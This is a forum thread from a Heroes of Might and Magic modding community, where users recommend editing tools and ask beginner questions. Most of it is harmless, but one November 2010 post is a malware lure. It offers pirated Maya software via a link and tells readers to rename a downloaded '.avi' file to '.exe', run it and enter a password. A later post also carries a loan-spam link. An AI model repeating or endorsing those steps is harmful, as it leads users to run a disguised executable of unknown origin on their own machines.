Thread: [Tools] Useful software for modders | This thread is pages long: 1 2 3 4 · «PREV / NEXT» |
Supreme Hero
posted January 16, 2008 04:09 PM |
The New Creature Framework simply makes the game accept more than the standard amount of creature slots. This means we can add new ones without changing anything of the old, and then can put these on our maps, or see them randomly appear in others, where the appropriate wildcard stack has been added in the map editor (I think!). But you are right, we cannot make them look entirely new. We are forced to make use of what is already in the game, but there are clever ways of making things look different - alpha changes, standard texture edits, animset swaps, modelinstances, particleinstances and so on. Plus of course we can specify new statistics and suchlike (although not new abilites).
Famous Hero
, eh?
posted January 18, 2008 05:04 AM |
so what Gnoll_Mage said translated to english is: the new creature framework increases the max of creatures to 300. you gotta use existing textures and effects to make creatures. you can recolour textures tho.
Supreme Hero
posted January 18, 2008 06:28 PM |
Yeah, something like that
Hired Hero
posted April 11, 2008 06:27 PM |
You can put [url=http://www.artmoney.ru/index.html]Artmoney SE[/url] in first post. It's advertised by author as a game cheating software, but it is good in-memory hex editor with system of filters that can be useful in modding too. And Artmoney SE is free.
Legendary Hero
posted July 10, 2008 10:37 PM |
Add in Paint.net to the list, it is a free grapic editor that can open DDS and ICO files.
Famous Hero
DoR Dev Team
posted April 25, 2009 12:51 PM |
Paint.net was a good program indeed
Famous Hero
NCF Blacksmith
posted September 10, 2009 05:46 PM |
Bonfire Studio
Bonfire Studio is an XML editor. very useful in editing XDB files. (we can easily color ourselves the keywords, values and so on).
Screen of code scripted with Bonfire Studio :
Link : http://code.google.com/p/nz-software/wiki/BonfireStudio
the complete and homogen NCF
Hired Hero
Upcoming Master-Modder :p
posted September 11, 2009 05:46 PM |
Total Commander
Unzips your mods temporarily, and you can look whats in it. You can Copy/Paste Textures, .xdb files, Geoms, Anims, ...
sry for my bad english ^^
Supreme Hero
of the Horadrim
posted September 19, 2009 11:57 AM |
Quote: mm. Nival released tools to view character models.
Where ? Can anyone give a link or something ?
| The HoMM Channel |
Tavern Dweller
posted October 15, 2009 08:11 AM |
Quote: mm. Nival released tools to view character models.
Where ? Can anyone give a link or something ?
Any updates on this one? Im also interested on the link. Hope to see answers soon. Thanks!
[URL=http://prettravaux.net/pret-travaux/pret-travaux]Prêt travaux[/URL]
Hired Hero
posted May 05, 2010 06:05 PM |
so what do i need for just simple moding?
like changing the numbers/types of creatures that you can hire from the ...... farms? that arent part of your towns, or changing how fast cripts regenerate the enemys to fight, that sort of thing.
Supreme Hero
posted May 05, 2010 07:26 PM |
I'm not sure if modifying those particular things is possible, but all you need for simple modding is a zipping program like 7-Zip (WinZip will probably do), and Notepad, etc.. Then just open the data files, and you can edit whatever, it's mostly in XML format which is usually reasonably easy to understand.
Don't forget, you shouldn't actually modify the data files (the archives that is). There are various ways of getting your changes in, you can save your edited files in a few places. I forget which ones work when...
Legendary Hero
fallen artist
posted May 05, 2010 07:47 PM |
You won't convince me that some random Bonfire Studio is better than Notepad++. Universal tool for editing any files, be it XML or .lod resources.
The future of Heroes 3 is here!
Hired Hero
posted May 05, 2010 08:33 PM |
Edited by spy46 at 20:57, 05 May 2010.
thanks, guess i will just have to see how that works out.
one of the things that i was wanting to do, for example, the human fortress type building that lets you hire downgraded versions of upper teir units, i thought should let you hire all of them, sort of like a min town, maybe even provide 500 gold
(not sure if there is any thing like that for the building)
thou this does bring me to a question, because i know that some games missions are set by triggers, would doing this efect the missions as well or just muli play?
where can i find the data for the buildings?
Undefeatable Hero
Chaos seeking Harmony
posted May 30, 2010 11:05 AM |
Ok, as somebody who is taking programming classes, I might get into Modding very soon. However, would be good if I could HCM experienced Modders if I get in a pinch. Any suggestions/volunteers?
Message received.
Hired Hero
posted May 30, 2010 05:57 PM |
all i know, is that the only real problem im seeing, is finding the files them self, for the most part, its actually fairly direct.
but not all of it.
Tavern Dweller
posted August 21, 2010 09:02 AM |
Thats really good idea by doing like that we can upto some extent make the game look different but entirely we cant change the games look But there are some option by which you can make the game look entirely different as del_diablo said by use of paint.net we can change grapic of the game. We can only add things we cant remove from it. by using paint.net we can make it attractive than before.
posted November 18, 2010 02:49 PM |
Hi everybody!
If you want downloading Alias Maya 6.0 then [url=http://ifolder.ru/20339140]that[/url] link just for you
Step #1
Download file - actek.avi
Step #2
Rename actek.avi as anyname.exe
Step #3
Run it
Step #4
Input password - it is p@Ssw0rD
Congradulations! Now you have distrib of Alias Maya 6.0
Undefeatable Hero
Smooth Snake
posted February 04, 2011 01:02 AM |
Dear modders of HC our VIP representative to Ubisoft concerning the development of H6 Cepheus just posted this
Quote: I may or may not have heard that we're looking for some redoubled discussions regarding the map editor at this time, specifically any major requests you might have. Not too late to implement your desires
Since some of you here are proficient like no others with the editor in H5 your input concerning this would be most appreciated considering you'll know the problems of the current editor the best and thus can provide the best input. I do hope some of you read this and find the time to post your suggestions and wishes here. You'd not only be helping yourselves for future projects but also people who'll start works of their own with the new editor. So please consider replying.
"All I can see is what's in front of me. And all I can do is keep moving forward" - The Heir Wielder of Names, Seeker of Thrones, King of Swords, Breaker of Infinities, Wheel Smashing Lord
Tavern Dweller
posted March 20, 2011 02:39 PM |
It's very hard to do any mod.Programs are even not work, textures don't stick on geometry...